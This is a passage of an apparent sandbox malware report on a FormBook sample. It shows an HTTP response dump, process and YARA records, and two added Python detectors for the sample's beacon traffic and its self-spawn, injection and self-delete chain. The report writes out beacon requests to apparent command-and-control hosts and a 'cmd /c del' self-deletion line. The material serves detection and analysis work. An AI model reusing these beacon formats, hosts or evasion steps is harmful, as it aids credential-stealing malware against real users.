69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67
                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name chang
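The sessions above all share one request shape: a GET from explorer.exe to a short directory (/goei/) carrying one long base64-looking parameter and one short token that stays constant across hosts (RL0=rVvxj02xpd_lyz), Connection: close, no User-Agent header, and a 7-byte all-zero body, sent to several unrelated hosts that answer 400/403/301/200/404. The report does not say which of those hosts is live C2 and which are decoys, and neither does the script below. The following is an added example, not part of the Joe Sandbox report: it triages HTTP request records for that shape and groups the hosts by the shared token. The request records (and the firefox.exe control record) are constructed from the traffic on this page; the indicator names, regexes and the 3-of-4 threshold are assumptions for illustration.

```python
"""FormBook-style HTTP beacon triage over request records.

Added example for this report, not Joe Sandbox output. SAMPLE_REQUESTS is
constructed from the explorer.exe sessions on this page plus one benign
control; indicator names, regexes and the min_hits threshold are assumptions.
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlsplit


@dataclass
class HttpRequest:
    process: str
    method: str
    target: str                  # request-target exactly as on the request line
    headers: Dict[str, str]
    body: bytes = b""


def header(req: HttpRequest, name: str) -> Optional[str]:
    """Case-insensitive header lookup (HTTP header names are case-insensitive)."""
    for k, v in req.headers.items():
        if k.lower() == name.lower():
            return v
    return None


def raw_query_params(target: str) -> List[Tuple[str, str]]:
    """Split the query string WITHOUT URL-decoding, so '+' and '/' inside a
    base64 blob survive (urllib's parse_qsl would turn '+' into a space)."""
    pairs = []
    for part in urlsplit(target).query.split("&"):
        if part:
            key, _, value = part.partition("=")
            pairs.append((key, value))
    return pairs


# Short lowercase directory such as /goei/, then exactly two parameters whose
# first value looks like base64 and is long enough to carry an encrypted record.
PATH_RE = re.compile(r"^/[a-z0-9]{2,8}/$")
BLOB_RE = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")
SEVEN_NULLS = b"\x00" * 7          # the 'Data Raw: 00 00 00 00 00 00 00' body above


def beacon_indicators(req: HttpRequest) -> List[str]:
    """Return the names of every indicator the request matches (empty = clean)."""
    hits: List[str] = []
    params = raw_query_params(req.target)
    if (req.method == "GET" and PATH_RE.match(urlsplit(req.target).path)
            and len(params) == 2 and BLOB_RE.match(params[0][1])):
        hits.append("formbook-uri-shape")
    if header(req, "User-Agent") is None:
        hits.append("no-user-agent")          # also flagged in the report's signatures
    if req.body == SEVEN_NULLS:
        hits.append("seven-null-body")
    if req.process.lower().endswith("\\explorer.exe"):
        hits.append("explorer-http")          # the shell has no business speaking HTTP
    return hits


def campaign_token(req: HttpRequest) -> Optional[str]:
    """The short second parameter (RL0=...) is identical across hosts; use it
    to tie requests issued from one configuration together."""
    params = raw_query_params(req.target)
    return params[1][1] if len(params) == 2 else None


def triage(requests: List[HttpRequest], min_hits: int = 3) -> Dict[str, List[str]]:
    """Map campaign token -> sorted hosts contacted with the beacon shape."""
    groups: Dict[str, set] = defaultdict(set)
    for r in requests:
        hits = beacon_indicators(r)
        if "formbook-uri-shape" in hits and len(hits) >= min_hits:
            groups[campaign_token(r) or "?"].add(header(r, "Host") or "?")
    return {tok: sorted(hosts) for tok, hosts in groups.items()}


EXPLORER = "C:\\Windows\\explorer.exe"
PREFIX = "/goei/?EzuXh6BP="
SUFFIX = "&RL0=rVvxj02xpd_lyz"

# Constructed from the four sessions shown above, plus one benign control.
SAMPLE_REQUESTS = [
    HttpRequest(EXPLORER, "GET", PREFIX + "BdWs9+XwUamw8CUuz3E8yrboev7iCL3gb6z7OkS86X4CeTXY3ejv3dXKop2WOnP3DDbLLyGv2A==" + SUFFIX,
                {"Host": "www.foodsystemsjusticeproject.com", "Connection": "close"}, SEVEN_NULLS),
    HttpRequest(EXPLORER, "GET", PREFIX + "iESvN3vx+46BgVwWtoPvPQmUnTMTtp1hHS9L6erIUoS4dJlpb0oL7GpX49j9BG002Zkja/L0IA==" + SUFFIX,
                {"Host": "www.batiktintaemas.com", "Connection": "close"}, SEVEN_NULLS),
    HttpRequest(EXPLORER, "GET", PREFIX + "WHzdRAWCNmljEZUdYknMeV5zI3m+uLt35kXWxc+UN/aPGTi9DTFvtLFMQ5OC8xESdqE/mkifJw==" + SUFFIX,
                {"Host": "www.addthat.xyz", "Connection": "close"}, SEVEN_NULLS),
    HttpRequest(EXPLORER, "GET", PREFIX + "1hbvBZ6scGrlPy0N1riO1jCdFmqX21DbBNOeXEZPJTZAL1bLTprMXMNvQ4/+FZIG6w0HvwIWjw==" + SUFFIX,
                {"Host": "www.evecrude.xyz", "Connection": "close"}, SEVEN_NULLS),
    # Constructed benign browser request: has a User-Agent, must not match.
    HttpRequest("C:\\Program Files\\Mozilla Firefox\\firefox.exe", "GET", "/index.html",
                {"Host": "www.example.com", "User-Agent": "Mozilla/5.0", "Connection": "keep-alive"}),
]

if __name__ == "__main__":
    for token, hosts in triage(SAMPLE_REQUESTS).items():
        print(token, hosts)
```

The query string is split by hand rather than with parse_qsl because the first parameter is base64-like and contains '+' and '/', which URL decoding would mangle. The same four-way test (URI shape, missing User-Agent, the null body, and the issuing process) maps directly onto proxy or EDR network logs; the process name is the strongest of the four, since a legitimate browser or updater will carry a User-Agent and will not be explorer.exe.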


                                                                    Code Manipulations

                                                                    Statistics

                                                                    Behavior

                                                                    System Behavior

                                                                    General

                                                                    Start time:12:45:47
                                                                    Start date:08/04/2021
                                                                    Path:C:\Users\user\Desktop\RCS76393.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Users\user\Desktop\RCS76393.exe'
                                                                    Imagebase:0x400000
                                                                    File size:386560 bytes
                                                                    MD5 hash:1AB1C3129FA0764EA0702DA70F3EF569
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.326066867.0000000003F40000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.326066867.0000000003F40000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.326066867.0000000003F40000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    Reputation:low

                                                                    General

                                                                    Start time:12:45:48
                                                                    Start date:08/04/2021
                                                                    Path:C:\Users\user\Desktop\RCS76393.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:'C:\Users\user\Desktop\RCS76393.exe'
                                                                    Imagebase:0x400000
                                                                    File size:386560 bytes
                                                                    MD5 hash:1AB1C3129FA0764EA0702DA70F3EF569
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000001.324919242.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.362951284.0000000000D00000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.362951284.0000000000D00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.362951284.0000000000D00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.362449000.0000000000990000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.362449000.0000000000990000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.362449000.0000000000990000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    Reputation:low

                                                                    General

                                                                    Start time:12:45:51
                                                                    Start date:08/04/2021
                                                                    Path:C:\Windows\explorer.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:
                                                                    Imagebase:0x7ff6f22f0000
                                                                    File size:3933184 bytes
                                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Start time:12:46:03
                                                                    Start date:08/04/2021
                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\msiexec.exe
                                                                    Imagebase:0x1a0000
                                                                    File size:59904 bytes
                                                                    MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.587150105.0000000000480000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.587150105.0000000000480000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.587150105.0000000000480000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.587988322.00000000030A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.590270038.0000000004890000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.590270038.0000000004890000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.590270038.0000000004890000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    Reputation:high

                                                                    General

                                                                    Start time:12:46:08
                                                                    Start date:08/04/2021
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:/c del 'C:\Users\user\Desktop\RCS76393.exe'
                                                                    Imagebase:0x2a0000
                                                                    File size:232960 bytes
                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Start time:12:46:12
                                                                    Start date:08/04/2021
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff61de10000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
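Read together, the six process records above are the chain a hunter wants to recognise from endpoint telemetry: the sample starts a second copy of itself one second later (the suspended child that is hollowed), a SysWOW64 binary (msiexec.exe) is started with nothing but its own path on the command line, and cmd.exe deletes the original dropper twenty seconds after it started. This section does not list parent PIDs, so the added example below (not part of the Joe Sandbox report) correlates on path, command line and start time only. The process records are constructed from the table above; the rule names and time windows are assumptions.

```python
"""Correlate process-start records into the self-spawn / inject / self-delete chain.

Added example for this report, not Joe Sandbox output. Parent PIDs are not
shown in this section, so every rule works from path, command line and start
time. PROCESSES is constructed from the System Behavior table above; the
time windows are assumptions.
"""
import re
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class ProcStart:
    start: datetime
    path: str
    cmdline: str


def _t(hms: str) -> datetime:
    return datetime.strptime("2021-04-08 " + hms, "%Y-%m-%d %H:%M:%S")


WINDIR = "c:\\windows\\"
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
DEL_RE = re.compile(r"""/c\s+del\s+['"]?(?P<target>[^'"]+?\.exe)['"]?\s*$""", re.IGNORECASE)


def is_bare_system_binary(p: ProcStart) -> bool:
    """System32/SysWOW64 image whose command line is just its own path: the
    shape of the helper process that injected code is started in."""
    low = p.path.lower()
    if not low.startswith(SYSTEM_DIRS):
        return False
    return p.cmdline.strip().strip('"').lower() == low


def self_spawn_pairs(procs: List[ProcStart],
                     window: timedelta = timedelta(seconds=5)) -> List[Tuple[ProcStart, ProcStart]]:
    """Same non-Windows image started twice within `window`: the second,
    suspended instance that process hollowing needs."""
    pairs = []
    last_seen: Dict[str, ProcStart] = {}
    for p in sorted(procs, key=lambda x: x.start):
        key = p.path.lower()
        if key.startswith(WINDIR):
            continue
        prev = last_seen.get(key)
        if prev is not None and p.start - prev.start <= window:
            pairs.append((prev, p))
        last_seen[key] = p
    return pairs


def self_delete_events(procs: List[ProcStart],
                       window: timedelta = timedelta(minutes=5)) -> List[Tuple[ProcStart, ProcStart]]:
    """cmd.exe /c del <X> where X is the image of a non-Windows process that
    started within `window` before it: on-disk cleanup of the dropper."""
    started = {p.path.lower(): p for p in sorted(procs, key=lambda x: x.start)
               if not p.path.lower().startswith(WINDIR)}
    hits = []
    for p in procs:
        if not p.path.lower().endswith("\\cmd.exe"):
            continue
        m = DEL_RE.search(p.cmdline)
        if m is None:
            continue
        victim = started.get(m.group("target").lower())
        if victim is not None and timedelta(0) <= p.start - victim.start <= window:
            hits.append((p, victim))
    return hits


def findings(procs: List[ProcStart]) -> List[str]:
    """One line per matched rule, in the order the chain unfolds."""
    out = []
    for first, second in self_spawn_pairs(procs):
        gap = int((second.start - first.start).total_seconds())
        out.append(f"self-spawn: {second.path} started again {gap}s after the first instance")
    for p in procs:
        if is_bare_system_binary(p):
            out.append(f"bare-system-binary: {p.path}")
    for _cmd, victim in self_delete_events(procs):
        out.append(f"self-delete: cmd.exe removed {victim.path}")
    return out


# Constructed from the System Behavior table above (start date 08/04/2021).
PROCESSES = [
    ProcStart(_t("12:45:47"), r"C:\Users\user\Desktop\RCS76393.exe", r"'C:\Users\user\Desktop\RCS76393.exe'"),
    ProcStart(_t("12:45:48"), r"C:\Users\user\Desktop\RCS76393.exe", r"'C:\Users\user\Desktop\RCS76393.exe'"),
    ProcStart(_t("12:45:51"), r"C:\Windows\explorer.exe", ""),
    ProcStart(_t("12:46:03"), r"C:\Windows\SysWOW64\msiexec.exe", r"C:\Windows\SysWOW64\msiexec.exe"),
    ProcStart(_t("12:46:08"), r"C:\Windows\SysWOW64\cmd.exe", r"/c del 'C:\Users\user\Desktop\RCS76393.exe'"),
    ProcStart(_t("12:46:12"), r"C:\Windows\System32\conhost.exe", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
]

if __name__ == "__main__":
    for line in findings(PROCESSES):
        print(line)
```

With parent PIDs available (Sysmon event 1 or an EDR process tree) the same three rules tighten considerably: the second RCS76393.exe should be a child of the first, the bare msiexec.exe a child of explorer.exe, and the cmd.exe a child of msiexec.exe rather than of the user's shell.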

                                                                    Disassembly

                                                                    Code Analysis
